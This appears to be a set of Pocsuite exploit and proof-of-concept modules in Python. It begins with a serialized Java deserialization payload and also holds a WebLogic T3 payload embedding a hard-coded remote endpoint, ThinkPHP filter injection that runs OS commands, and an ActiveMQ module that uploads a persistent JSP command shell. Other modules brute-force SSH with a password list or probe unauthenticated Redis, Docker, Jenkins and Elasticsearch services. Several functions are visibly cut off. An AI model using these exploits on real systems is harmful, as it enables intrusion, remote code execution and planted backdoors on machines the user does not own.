f\x41\x32\x9b\x39\x74\x02\x00\x00\x70\x78\x70\x00\x00\x00\x10\x73\x72\x00\x2e\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x24\x53\x65\x67\x6d\x65\x6e\x74\x1f\x36\x4c\x90\x58\x93\x29\x3d\x02\x00\x01\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x70\x78\x72\x00\x28\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x52\x65\x65\x6e\x74\x72\x61\x6e\x74\x4c\x6f\x63\x6b\x66\x55\xa8\x2c\x2c\xc8\x6a\xeb\x02\x00\x01\x4c\x00\x04\x73\x79\x6e\x63\x74\x00\x2f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2f\x6c\x6f\x63\x6b\x73\x2f\x52\x65\x65\x6e\x74\x72\x61\x6e\x74\x4c\x6f\x63\x6b\x24\x53\x79\x6e\x63\x3b\x70\x78\x70\x73\x72\x00\x34\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x52\x65\x65\x6e\x74\x72\x61\x6e\x74\x4c\x6f\x63\x6b\x24\x4e\x6f\x6e\x66\x61\x69\x72\x53\x79\x6e\x63\x65\x88\x32\xe7\x53\x7b\xbf\x0b\x02\x00\x00\x70\x78\x72\x00\x2d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x52\x65\x65\x6e\x74\x72\x61\x6e\x74\x4c\x6f\x63\x6b\x24\x53\x79\x6e\x63\xb8\x1e\xa2\x94\xaa\x44\x5a\x7c\x02\x00\x00\x70\x78\x72\x00\x35\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x41\x62\x73\x74\x72\x61\x63\x74\x51\x75\x65\x75\x65\x64\x53\x79\x6e\x63\x68\x72\x6f\x6e\x69\x7a\x65\x72\x66\x55\xa8\x43\x75\x3f\x52\xe3\x02\x00\x01\x49\x00\x05\x73\x74\x61\x74\x65\x70\x78\x72\x00\x36\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x41\x62\x73\x74\x72\x61\x63\x74\x4f\x77\x6e\x61\x62\x6c\x65\x53\x79\x6e\x63\x68\x72\x6f\x6e\x69\x7a\x65\x72\x33\xdf\xaf\xb9\xad\x6d\x6f\xa9\x02\x00\x00\x70\x78\x70\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x26\x73\x71\x00\x7e\x00\x2a\x00\x00\x00\x00\x3f\x40\x00\x00\x70\x70\x78\x74\x00\x08\x65\x6e\x74\x72\x79\x53\x65\x74\x76\x72\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x78\x70\x78\x71\x00\x7e\x00\x4f'
    try:
        # Command embedded in the serialized object; hard-coded.
        payload_cmd = "whoami"
        # Hex form of the command (Python 2 str.encode('hex')).
        hex_tmp = payload_cmd.encode('hex')
        # Original comment: "x = hex, 02 = zero-pad to two digits".
        length_hex = "%02x" % (len(hex_tmp) / 2)
        # Original comment: "packet layout: prefix, length, command, suffix".
        send_payload = payload_one + length_hex + payload_cmd + payload_three
        # NOTE(review): the socket has no timeout and is only closed on the
        # success path; an exception after connect() leaks it.
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        server_address = (_host, int(_port))
        sock.connect(server_address)
        print '[**]sending payload...'
        sock.send(send_payload)
        '''
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = vul_url
        result['VerifyInfo']['Payload'] = send_payload
        '''
        sock.close()
    except Exception, e:
        result = {}
    # NOTE(review): `result` is never populated (the assignment above sits in a
    # string literal) and there is no return, so save_output is never called
    # and the method yields None.
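def host_port(self, vul_url):
    """Return ``http://<host>:<port>`` for *vul_url*.

    The port is taken from an explicit ``:<port>`` in the URL, otherwise
    ``"8080"``.  The scheme is always rewritten to ``http://`` (the original
    comment notes that https targets are not handled).

    Fix: the original built the result with ``_host + ":" + _port``, which
    raises TypeError when ``url2ip`` hands back the port as an int; ``%s``
    formatting accepts either type and yields the same text.
    """
    import re
    from pocsuite.lib.utils.funs import url2ip

    if re.findall(r':(\d+)\s*', vul_url):
        host_and_port = url2ip(vul_url)
        _host, _port = host_and_port[0], host_and_port[1]
    else:
        _host = url2ip(vul_url)
        _port = "8080"
    return "http://%s:%s" % (_host, _port)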
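def _verify(self):
    """Detect an Elasticsearch HTTP endpoint reachable without authentication.

    Requests ``http://<host>:<port>/`` (port from ``self.url``, else 9200) and
    records VerifyInfo when the 200 reply carries the Elasticsearch banner
    ``You Know, for Search``.  Progress is printed as the original did.

    Fix: the method never returned, so the populated result was discarded;
    it now ends with ``self.save_output(result)`` like the sibling checks.
    ``socket.setdefaulttimeout(2)`` is process-wide and kept only because the
    original relied on it.
    """
    import re
    import socket
    from pocsuite.lib.utils.funs import url2ip

    socket.setdefaulttimeout(2)
    result = {}
    vul_url = '%s' % self.url
    if re.findall(r':(\d+)\s*', vul_url):
        host_and_port = url2ip(vul_url)
        _host, _port = host_and_port[0], host_and_port[1]
    else:
        _host = url2ip(vul_url)
        _port = 9200
    payload = 'http://%s:%s/' % (_host, _port)
    try:
        print(payload)
        response = requests.get(payload, timeout=2)
        print(response.status_code)
        if response.status_code == 200:
            print("check content")
            if response.content.find("You Know, for Search") >= 0:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = _host
                result['VerifyInfo']['Payload'] = payload
    except Exception as ex:
        print(ex)
    return self.save_output(result)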
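def _verify(self):
    """Detect a Redis instance that answers ``info`` without authentication.

    Host/port come from ``self.url`` (default ``"6379"``).  The raw ``info``
    command is sent and VerifyInfo recorded when the reply contains
    ``redis_version``.  Returns ``self.save_output(result)``.

    Fixes: ``socket.setdefaulttimeout(1)`` was called after the socket had
    been created, so it did not apply and the connect could block
    indefinitely; the socket is now closed in a ``finally``; the bare
    ``except`` is narrowed to ``Exception``.
    """
    import re
    import socket
    from pocsuite.lib.utils.funs import url2ip

    result = {}
    vul_url = '%s' % self.url
    if re.findall(r':(\d+)\s*', vul_url):
        host_and_port = url2ip(vul_url)
        _host, _port = host_and_port[0], host_and_port[1]
    else:
        _host = url2ip(vul_url)
        _port = "6379"
    payload = '\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a'  # "\r\ninfo\r\n"
    socket.setdefaulttimeout(1)  # must precede socket() to take effect
    s = socket.socket()
    try:
        s.connect((_host, int(_port)))
        s.send(payload)
        recvdata = s.recv(1024)
        if recvdata and 'redis_version' in recvdata:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = _host
            result['VerifyInfo']['Payload'] = payload
    except Exception:
        # Unreachable or non-Redis service: report nothing.
        pass
    finally:
        s.close()
    print('[+]1 poc done')
    return self.save_output(result)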
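def _verify(self):
    """Probe an IIS host with an out-of-range ``Range`` header.

    Sends one ``GET /`` with ``Range: bytes=0-18446744073709551615`` and records
    VerifyInfo when the reply contains ``Requested Range Not Satisfiable`` and
    a ``Server: Microsoft`` header.  Returns ``self.save_output(result)``.

    Fixes: ``connect()``/``send()`` were outside the ``try``, so a closed port
    raised out of the method and leaked the socket; ``data`` was printed even
    when ``recv()`` failed (NameError); the non-vulnerable path returned None.
    """
    import re
    import socket

    result = {}
    ip = url2ip(self.url)
    if re.findall(r':(\d+)\s*', self.url):
        _port = url2ip(self.url)[1]
    else:
        _port = 80
    flag = "GET / HTTP/1.0\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n"
    data = ''
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(2.0)
    try:
        sock.connect((ip, int(_port)))
        sock.send(flag)
        data = sock.recv(1024)
    except Exception:
        print('连接失败')
    finally:
        sock.close()
    print(data)
    if 'Requested Range Not Satisfiable' in data and 'Server: Microsoft' in data:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['url'] = ip
        result['VerifyInfo']['Payload'] = ip + 'fastcgi read file vul'
    return self.save_output(result)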
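def _verify(self):
    """Detect an unauthenticated Jenkins script console.

    Tries ``/script`` and ``/ajaxBuildQueue`` at the root and then under
    ``/jenkins``; both must answer 200 and the script page must contain
    ``Jenkins.instance.pluginManager.plugins``.  Returns
    ``self.save_output(result)``.

    Fix: the original never returned, so the result was discarded; the two
    copies of the probe are folded into one loop over the context paths.
    """
    import re

    result = {}
    vul_url = '%s' % self.url
    if re.findall(r':(\d+)\s*', vul_url):
        host_and_port = url2ip(vul_url)
        _host, _port = host_and_port[0], host_and_port[1]
    else:
        _host = url2ip(vul_url)
        _port = "8080"
    vul_ip = "http://%s:%s" % (_host, _port)
    print(vul_ip)
    marker = "Jenkins.instance.pluginManager.plugins"
    try:
        for prefix in ("", "/jenkins"):
            response1 = req.get(url=vul_ip + prefix + "/script", timeout=5)
            response2 = req.get(url=vul_ip + prefix + "/ajaxBuildQueue", timeout=5)
            if (response1.status_code == 200 and marker in response1.text
                    and response2.status_code == 200):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = vul_ip
                break
    except Exception:
        # Transport errors count as "not confirmed".
        pass
    return self.save_output(result)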
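def _verify(self):
    """Detect a Docker daemon API exposed without authentication.

    Requests ``http://<host>:<port>/info`` (port from ``self.url``, else
    ``"2376"``) and records VerifyInfo, with the response body as Payload,
    when the body mentions ``docker``.  Returns ``self.save_output(result)``.

    Fix: the bare ``except`` is narrowed to ``Exception`` so interrupts are not
    swallowed; the dead ``else: pass`` branch is dropped.
    """
    import re
    from pocsuite.lib.utils.funs import url2ip

    result = {}
    vul_url = '%s' % self.url
    if re.findall(r':(\d+)\s*', vul_url):
        host_and_port = url2ip(vul_url)
        _host, _port = host_and_port[0], host_and_port[1]
    else:
        _host = url2ip(vul_url)
        _port = "2376"
    payload = "http://" + _host + ":" + _port + "/info"
    try:
        recvdata = req.get(url=payload, timeout=5).content
        if recvdata and 'docker' in recvdata:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = payload
            result['VerifyInfo']['Payload'] = recvdata
    except Exception:
        # Unreachable or non-Docker endpoint: report nothing.
        pass
    print('[+]10 poc done')
    return self.save_output(result)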
def _verify(self):
    result = {}
    vul_url = '%s' % self.url
    # Port from the URL if one was given, otherwise the default.
    import re
    from pocsuite.lib.utils.funs import url2ip
    _port = re.findall(':(\d+)\s*', vul_url)
    if len(_port) != 0:
        _host = url2ip(vul_url)[0]
        _port = url2ip(vul_url)[1]
    else:
        _host = url2ip(vul_url)
        _port = "27017"
    test_url = str("http://" + _host + ":" + _port)
    try:
        # Redirects disabled; only the raw body is kept.
        response = req.get(url=test_url, timeout=5, allow_redirects=False).content
    except Exception, e:
        response = ""
    # NOTE(review): `response` is never inspected and nothing is returned, so
    # this method always yields None; the check looks truncated.
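def _verify(self):
    """Detect a ZooKeeper server that answers the ``envi`` four-letter command.

    Host from ``self.url``, port from the URL or 2181.  VerifyInfo is recorded
    when the reply contains ``Environment``.  Returns
    ``self.save_output(result)``.

    Fixes: ``socket.setdefaulttimeout(5)`` was called after the socket had
    been created, so the connect had no timeout; a port parsed from the URL
    is passed to ``connect()`` as an int; the socket is closed in a
    ``finally``.
    """
    import re
    import socket
    from pocsuite.lib.utils.funs import url2ip

    result = {}
    vul_url = '%s' % self.url
    if re.findall(r':(\d+)\s*', vul_url):
        host_and_port = url2ip(vul_url)
        _host, _port = host_and_port[0], host_and_port[1]
    else:
        _host = url2ip(vul_url)
        _port = 2181
    payload = '\x65\x6e\x76\x69'  # "envi"
    socket.setdefaulttimeout(5)  # must precede socket() to take effect
    s = socket.socket()
    try:
        s.connect((_host, int(_port)))
        s.send(payload)
        recvdata = s.recv(2048)
        if 'Environment' in recvdata:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['Payload'] = payload
    except Exception as e:
        print(e)
    finally:
        s.close()
    print('[+]27 poc done')
    return self.save_output(result)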
def _verify(self):
    # Original comment: "call the fingerprint method".
    result = {}
    # Port from the URL if one was given, otherwise the default.
    import re
    import socket
    import time
    vul_url = "%s" % self.url
    # url2ip is expected from file scope (its import is commented out here).
    _port = re.findall(':(\d+)\s*', vul_url)
    if len(_port) != 0:
        _host = url2ip(vul_url)[0]
        _port = url2ip(vul_url)[1]
    else:
        _host = url2ip(vul_url)
        _port = "7001"
    vul_ip = "http://%s:%s" % (_host, _port)
    # NOTE(review): 75 s timeout, and the socket is never closed on any path.
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(75)
    server_addr = (_host, int(_port))
    # T3 handshake and request framing come from helpers defined elsewhere.
    t3_handshake(sock, server_addr)
    build_t3_request_object(sock, int(_port))
    # Hex-encoded serialized Java object sent as the T3 request body; it appears
    # to embed a hard-coded UnicastRef endpoint (decode the hex to inspect).
    payload = "aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707736000a556e6963617374526566000d3131382e38392e35332e3133390000044bffffffffe355c3aa00000000000000000000000000000078"
    res = send_payload_objdata(sock, payload)
    # A "$Proxy<N>" class name in the reply is taken as confirmation.
    p = re.findall('\\$Proxy[0-9]+', res, re.S)
    if (len(p) > 0):
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = vul_ip
        result['VerifyInfo']['Payload'] = payload
    return self.save_output(result)
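def _verify(self):
    """Check a MetInfo ``old_thumb`` path-traversal read of ``config_db.php``.

    Host/port from ``self.url`` (default 80).  After a TCP reachability check
    the traversal URL is requested and VerifyInfo recorded when the response
    contains ``con_db_id``.  Returns ``self.save_output(result)``.

    Fixes: the pre-check socket is closed on every path (it leaked when
    ``connect()`` failed); the port is passed to ``connect()`` as an int; the
    HTTP request gets a timeout so an unresponsive host cannot hang the scan;
    unused ``time``/``ftplib`` imports are dropped.
    """
    import re
    import socket
    from pocsuite.lib.utils.funs import url2ip

    result = {}
    vul_url = '%s' % self.url
    if re.findall(r':(\d+)\s*', vul_url):
        host_and_port = url2ip(vul_url)
        _host, _port = host_and_port[0], host_and_port[1]
    else:
        _host = url2ip(vul_url)
        _port = 80
    vul_ip = "http://%s:%s" % (_host, _port)
    sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sk.settimeout(1)
    try:
        sk.connect((_host, int(_port)))
    except Exception:
        return self.save_output(result)
    finally:
        sk.close()
    try:
        url = vul_ip + "/member/index.php?a=doshow&m=include&c=old_thumb&dir=http/./.../..././/./.../..././/config/config_db.php"
        body = req.get(url, timeout=5).text
        if "con_db_id" in body:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = _host
            result['VerifyInfo']['Payload'] = url
    except Exception:
        # Transport errors count as "not confirmed".
        pass
    return self.save_output(result)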
def _verify(self): #定义返回结果 result = {} #获取漏洞url vul_url = '%s' % self.url #如果设置端口则取端口,没有设置则为默认端口 import re from pocsuite.lib.utils.funs import url2ip _port = re.findall(':(\d+)\s*', vul_url) if len(_port) != 0: _host = url2ip(vul_url)[0] _port = url2ip(vul_url)[1] else : _host = url2ip(vul_url) _port = "8087" vul_host = _host + ":" + _port #print vul_host try: vul_result = self.poc(vul_host) except Exception, e: vul_result = False
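def _verify(self):
    """Verify a path traversal through the Accept-Language header.

    Flow: resolve host/port from self.url (default port 8080), then GET
    /plugin/credentials/.ini with Accept-Language set to
    "../" * BACKDIR_COUNT + "windows/win"; a body containing "MPEGVideo"
    (present in a Windows win.ini) is taken as the traversal signature.
    Only Windows targets are detected by this marker.

    Fix over the original: the second gate `text.find('version')` was a
    no-op — str.find returns -1 when absent, which is truthy — so it is
    dropped rather than kept as a misleading check. A request timeout is
    added and the unused hashlib/Output locals removed.

    Returns self.save_output(result); VerifyInfo {URL, Payload} is set only on
    a match.
    """
    import re

    result = {}
    vul_url = "%s" % self.url
    _port = re.findall(r':(\d+)\s*', vul_url)
    if len(_port) != 0:
        _host = url2ip(vul_url)[0]
        _port = url2ip(vul_url)[1]
    else:
        _host = url2ip(vul_url)
        _port = "8080"
    vul_ip = "http://%s:%s" % (_host, _port)

    file_name = "windows/win"
    BACKDIR_COUNT = 8
    header = {'Accept-Language': ('../' * BACKDIR_COUNT) + file_name}
    vulurl = vul_ip + '/plugin/credentials/.ini'
    try:
        resp = req.get(vulurl, headers=header, timeout=5)
        if "MPEGVideo" in resp.text:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vulurl
            result['VerifyInfo']['Payload'] = header
    except Exception:
        # Best-effort probe: transport errors mean "not confirmed".
        pass
    return self.save_output(result)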
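def has_printf_echo(text):
    """Return True if *text* contains "printf", "1234567890" and "filter" adjacent, in any order.

    This is the signature of the harmless `printf` filter probe: ThinkPHP
    applies the injected filter to the parameters and echoes them back
    concatenated, so the three tokens appear side by side in some order.
    """
    import itertools

    tokens = ("printf", "1234567890", "filter")
    return any("".join(order) in text for order in itertools.permutations(tokens))


def has_start_php_leak(text):
    """Return True if *text* shows the output of `more index.php` (it names thinkphp/start.php)."""
    return "thinkphp/start.php" in text


def _verify(self):
    """Verify a ThinkPHP 5 method-override / filter injection.

    Flow: resolve host/port from self.url (default 80), confirm the TCP port
    answers, then POST a sequence of probes and stop at the first positive.
    The first two probes are non-destructive (`printf` filter echo); the
    remaining four set `filter[]=system` and run `more index.php` on the
    target, i.e. they execute an OS command. Keep that order — do not move the
    command-executing probes first — and expect them to show up in the
    target's web logs.

    Fixes over the original: the result `Payload` referenced an undefined
    name `p`, which raised NameError inside the try, left a half-filled
    VerifyInfo and caused the remaining command-executing probes to be sent
    even after a positive; the first probe used `requests.post` while the rest
    use the module's `req`; the check socket is now always closed.

    Returns self.save_output(result); VerifyInfo {URL, Payload} is set for the
    first matching probe.
    """
    import re
    import socket

    result = {}
    vul_url = "%s" % self.url
    _port = re.findall(r':(\d+)\s*', vul_url)
    if len(_port) != 0:
        _host = url2ip(vul_url)[0]
        _port = int(url2ip(vul_url)[1])
    else:
        _host = url2ip(vul_url)
        _port = 80

    sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sk.settimeout(1)
    try:
        sk.connect((_host, _port))
    except Exception:
        return self.save_output(result)
    finally:
        sk.close()

    vul_ip = "http://%s:%s" % (_host, _port)
    captcha_data = {"_method": "__construct", "filter[]": "system", "method": "get", "get[]": "more index.php"}
    request_method_data = {"_method": "__construct", "filter[]": "system", "server[REQUEST_METHOD]": "more index.php"}
    # (path, POST body, predicate on the response text); harmless probes first.
    probes = [
        ("/public/index.php", {"c": "printf", "f": "1234567890", "_method": "filter"}, has_printf_echo),
        ("/index.php", {"c": "printf", "f": "1234567890", "method": "filter"}, has_printf_echo),
        ("/public/index.php?s=captcha", captcha_data, has_start_php_leak),
        ("/index.php?s=captcha", captcha_data, has_start_php_leak),
        ("/public/index.php", request_method_data, has_start_php_leak),
        ("/index.php", request_method_data, has_start_php_leak),
    ]
    for path, data, looks_vulnerable in probes:
        url = vul_ip + path
        try:
            text = req.post(url, data=data, timeout=4).text
        except Exception:
            continue  # unreachable/timeout: try the next variant
        if looks_vulnerable(text):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = url
            result['VerifyInfo']['Payload'] = data
            break
    return self.save_output(result)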
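# JSP command shell dropped by _attack. __SHELL_PWD__ is replaced per run so the
# dropped file is not a backdoor with a password anyone can read in this repo.
JSP_SHELL_TEMPLATE = '''
<%
    if("__SHELL_PWD__".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b, 0, a));
        }
        out.print("</pre>");
    }
%>
'''


def build_jsp_shell(pwd):
    """Return the JSP shell source guarded by *pwd*.

    Fix over the original shell: `new String(b)` converted the whole 2048-byte
    buffer on every read, appending stale bytes/NULs after short reads;
    `new String(b, 0, a)` uses only the bytes actually read.
    """
    return JSP_SHELL_TEMPLATE.replace("__SHELL_PWD__", pwd)


def _attack(self):
    """Drop a JSP shell through the ActiveMQ fileserver PUT/MOVE and run `id`.

    Flow: resolve host/port from self.url (default 8161); PUT a malformed
    path to learn the webapp base directory from the error reason; PUT the
    shell as /fileserver/haha.jsp; MOVE it into admin/ via the Destination
    header; GET /admin/haha.jsp?pwd=<pwd>&i=id and look for "uid" in the body.

    NOTE(review): this leaves haha.jsp in the admin webapp — it is never
    removed, and the original shipped it with the fixed password "sec". The
    password is now random per run (it is recorded in VerifyInfo['Payload']),
    but the file persists: remove it from the target after testing.

    All errors are reported via print and swallowed (best-effort attack
    module). Returns self.save_output(result).
    """
    import os
    import re

    result = {}
    vul_url = '%s' % self.url
    _port = re.findall(r':(\d+)\s*', vul_url)
    if len(_port) != 0:
        _host = url2ip(vul_url)[0]
        _port = url2ip(vul_url)[1]
    else:
        _host = url2ip(vul_url)
        _port = '8161'
    url = 'http://%s:%s' % (_host, _port)

    # Per-run shell password; hex over bytearray works on Python 2 and 3.
    shell_pwd = "".join("%02x" % byte for byte in bytearray(os.urandom(8)))

    try:
        # The fileserver echoes the absolute path in the error reason; take the
        # part up to "fileserver/" as the webapps base directory.
        get_fileserver_path_url = url + '/fileserver/%08/..%08/.%08/%08'
        res = req.put(url=get_fileserver_path_url, timeout=5, allow_redirects=False)
        match = re.search(r'/.*?(?=fileserver/.*)', res.reason)
        if match is None:
            print("could not recover the webapps path from: %r" % (res.reason,))
            return self.save_output(result)
        path = match.group(0)

        put_jsp_url = url + '/fileserver/haha.jsp'
        res = req.put(url=put_jsp_url, timeout=5, allow_redirects=False, data=build_jsp_shell(shell_pwd))
        if res.status_code != 204:
            return self.save_output(result)

        headers = {'Destination': 'file://' + path + 'admin/haha.jsp'}
        res = req.request('move', url=put_jsp_url, timeout=5, allow_redirects=False, headers=headers)
        if res.status_code != 204:
            return self.save_output(result)

        exploit_url = url + '/admin/haha.jsp?pwd=%s&i=id' % shell_pwd
        res = req.get(url=exploit_url, timeout=5, allow_redirects=False)
        if 'uid' in res.text:
            id_info = re.findall(r'(?<=<pre>).*', res.text)[0]
            print(id_info)
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['Payload'] = exploit_url
    except Exception as e:
        print(e)
    return self.save_output(result)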
def _verify(self): result = {} vul_url = '%s' % self.url import re import time import paramiko from pocsuite.lib.utils.funs import url2ip _port = re.findall(':(\d+)\s*', vul_url) if len(_port) != 0: _host = url2ip(vul_url)[0] _port = int(url2ip(vul_url)[1]) else: _host = url2ip(vul_url) _port = 22 #判断端口是否开放 import socket sk = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sk.settimeout(1) try: sk.connect((_host, _port)) #print 'Server port is OK!' except Exception: return self.save_output(result) sk.close() flag = False payload = "弱口令" username = [ "root", "admin", ] password = [ "", "toor", "1234", "123456", "admin", "Admin", "ADMIN", "admin123", "Admin123", "root", "root123", "123.com" '123456', 'admin', 'root', 'password', '123123', '123', '1', '', 'P@ssw0rd!!', 'qwa123', '12345678', 'test', '123qwe!@#', '123456789', '123321', '1314520', '666666', 'woaini', 'fuckyou', '000000', '1234567890', '8888888', 'qwerty', '1qaz2wsx', 'abc123', 'abc123456', '1q2w3e4r', '123qwe', '159357', 'p@ssw0rd', 'p@55w0rd', 'password!', 'p@ssw0rd!', 'password1', 'r00t', 'system', '111111', 'admin', "1", "toor", "1234", "123456", "admin", "Admin", "ADMIN", "admin123", "Admin123", "root", "root123", "123.com", "ct123!@#" ] for u in username: for p in password: ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: print p ssh.connect(hostname=_host, port=_port, username=u, password=p, timeout=1, allow_agent=False, look_for_keys=False) #执行命令 stdin, stdout, stderr = ssh.exec_command('whoami', timeout=1) #获取命令结果 resultname = stdout.read().split("\n")[0] if resultname == u: payload += str(u) + ":" + str(p) result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = _host result['VerifyInfo']['Payload'] = payload ssh.close() except Exception, ex: ssh.close()